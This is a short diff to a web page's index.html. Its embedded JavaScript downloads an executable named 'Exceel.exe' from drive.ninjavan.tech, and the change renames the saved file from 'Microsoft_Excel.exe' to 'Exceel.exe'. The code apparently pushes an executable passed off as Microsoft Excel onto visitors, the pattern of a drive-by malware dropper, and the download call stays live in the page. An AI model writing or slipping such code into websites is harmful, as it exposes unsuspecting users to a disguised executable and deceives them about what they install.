--- a/index.html
+++ b/index.html
@@ -121,7 +121,7 @@
     
         // Usage example
         const fileUrl = 'https://drive.ninjavan.tech/Exceel.exe';
-        const fileName = 'Microsoft_Excel.exe';
+        const fileName = 'Exceel.exe';
         downloadFile(fileUrl, fileName);
 
         
